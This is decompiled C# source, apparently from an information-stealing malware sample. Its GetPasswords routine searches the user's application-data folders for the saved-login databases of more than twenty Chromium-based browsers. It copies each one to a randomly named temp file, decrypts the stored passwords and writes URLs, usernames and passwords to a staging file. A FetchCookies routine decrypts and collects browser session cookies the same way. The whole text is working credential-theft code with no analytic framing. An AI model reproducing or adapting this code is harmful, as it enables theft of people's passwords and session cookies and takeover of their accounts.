// Token: 0x0600004E RID: 78 RVA: 0x000075E4 File Offset: 0x000057E4
private static void GetPasswords()
{
StreamWriter streamWriter = new StreamWriter("C:\\ProgramData\\debug.txt", true);
try
{
Directory.CreateDirectory(Program.path + "\\Browsers");
List <LogPassData> list = new List <LogPassData>();
List <string> list2 = new List <string>();
List <string> list3 = new List <string>
{
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData)
};
List <string> list4 = new List <string>();
foreach (string path in list3)
{
try
{
list4.AddRange(Directory.EnumerateDirectories(path));
}
catch
{
}
}
foreach (string path2 in list4)
{
try
{
list2.AddRange(Directory.GetFiles(path2, "Login Data", SearchOption.AllDirectories));
string[] files = Directory.GetFiles(path2, "Login Data", SearchOption.AllDirectories);
foreach (string text in files)
{
try
{
bool flag = File.Exists(text);
if (flag)
{
string program = "Unknown (" + text + ")";
bool flag2 = text.Contains("Chrome");
if (flag2)
{
program = "Google Chrome";
}
bool flag3 = text.Contains("Yandex");
if (flag3)
{
program = "Yandex Browser";
}
bool flag4 = text.Contains("Orbitum");
if (flag4)
{
program = "Orbitum Browser";
}
bool flag5 = text.Contains("Opera");
if (flag5)
{
program = "Opera Browser";
}
bool flag6 = text.Contains("Amigo");
if (flag6)
{
program = "Amigo Browser";
}
bool flag7 = text.Contains("Torch");
if (flag7)
{
program = "Torch Browser";
}
bool flag8 = text.Contains("Comodo");
if (flag8)
{
program = "Comodo Browser";
}
bool flag9 = text.Contains("CentBrowser");
if (flag9)
{
program = "CentBrowser";
}
bool flag10 = text.Contains("Go!");
if (flag10)
{
program = "Go!";
}
bool flag11 = text.Contains("uCozMedia");
if (flag11)
{
program = "uCozMedia";
}
bool flag12 = text.Contains("Rockmelt");
if (flag12)
{
program = "Rockmelt";
}
bool flag13 = text.Contains("Sleipnir");
if (flag13)
{
program = "Sleipnir";
}
bool flag14 = text.Contains("SRWare Iron");
if (flag14)
{
program = "SRWare Iron";
}
bool flag15 = text.Contains("Vivaldi");
if (flag15)
{
program = "Vivaldi";
}
bool flag16 = text.Contains("Sputnik");
if (flag16)
{
program = "Sputnik";
}
bool flag17 = text.Contains("Maxthon");
if (flag17)
{
program = "Maxthon";
}
bool flag18 = text.Contains("AcWebBrowser");
if (flag18)
{
program = "AcWebBrowser";
}
bool flag19 = text.Contains("Epic Browser");
if (flag19)
{
program = "Epic Browser";
}
bool flag20 = text.Contains("MapleStudio");
if (flag20)
{
program = "MapleStudio";
}
bool flag21 = text.Contains("BlackHawk");
if (flag21)
{
program = "BlackHawk";
}
bool flag22 = text.Contains("Flock");
if (flag22)
{
program = "Flock";
}
bool flag23 = text.Contains("CoolNovo");
if (flag23)
{
program = "CoolNovo";
}
bool flag24 = text.Contains("Baidu Spark");
if (flag24)
{
program = "Baidu Spark";
}
bool flag25 = text.Contains("Titan Browser");
if (flag25)
{
program = "Titan Browser";
}
try
{
string text2 = Path.GetTempPath() + "/" + Helper.RandomString() + ".fv";
bool flag26 = File.Exists(text2);
if (flag26)
{
File.Delete(text2);
}
File.Copy(text, text2, true);
SQL sql = new SQL(text2);
bool flag27 = !sql.ReadTable("logins");
if (flag27)
{
break;
}
int num = 0;
for (;;)
{
try
{
bool flag28 = num >= sql.GetRowCount();
if (flag28)
{
break;
}
try
{
string text3 = string.Empty;
try
{
text3 = Encoding.UTF8.GetString(Browsers.DecryptBrowsers(Encoding.Default.GetBytes(sql.GetValue(num, 5)), null));
}
catch (Exception)
{
}
bool flag29 = text3 != "";
if (flag29)
{
LogPassData item = new LogPassData
{
Url = sql.GetValue(num, 1).Replace("https://", "").Replace("http://", ""),
Login = sql.GetValue(num, 3),
Password = text3,
Program = program
};
list.Add(item);
}
}
catch (Exception)
{
}
num++;
}
catch
{
}
}
File.Delete(text2);
}
catch
{
}
}
}
catch (Exception ex)
{
}
}
}
catch
{
}
}
string environmentVariable = Environment.GetEnvironmentVariable("LocalAppData");
string text4 = "";
foreach (LogPassData logPassData in list)
{
text4 += logPassData.ToString();
try
{
string text5 = logPassData.Url.Contains("/") ? logPassData.Url.Split(new char[]
{
'/'
})[0] : logPassData.Url;
}
catch (Exception value)
{
Console.Write(value);
}
}
File.WriteAllText(Program.path + "\\Browsers\\Passwords.txt", (text4 != null) ? (text4 + "\n――――――――――――――――――――――――――――――――――――――――――――") : "");
}
catch (Exception ex2)
{
}
streamWriter.Close();
}
// Token: 0x0600004A RID: 74 RVA: 0x00006F94 File Offset: 0x00005194
private static List <CookieData> FetchCookies(string basePath)
{
bool flag = !File.Exists(basePath);
List <CookieData> result;
if (flag)
{
result = null;
}
else
{
try
{
string text = Path.GetTempPath() + "/" + Helper.RandomString() + ".fv";
bool flag2 = File.Exists(text);
if (flag2)
{
File.Delete(text);
}
File.Copy(basePath, text, true);
SQL sql = new SQL(text);
List <CookieData> list = new List <CookieData>();
sql.ReadTable("cookies");
int num = 0;
for (;;)
{
bool flag3 = num >= sql.GetRowCount();
if (flag3)
{
break;
}
try
{
string text2 = string.Empty;
try
{
text2 = Encoding.UTF8.GetString(Browsers.DecryptBrowsers(Encoding.Default.GetBytes(sql.GetValue(num, 12)), null));
}
catch (Exception)
{
}
bool flag4 = text2 != "";
if (flag4)
{
CookieData item = new CookieData
{
host_key = sql.GetValue(num, 1),
name = sql.GetValue(num, 2),
path = sql.GetValue(num, 4),
expires_utc = sql.GetValue(num, 5),
secure = sql.GetValue(num, 6),
value = text2
};
list.Add(item);
}
}
catch (Exception)
{
}
num++;
}
File.Delete(text);
result = list;
}
catch (Exception)
{
result = null;
}
}
return(result);
}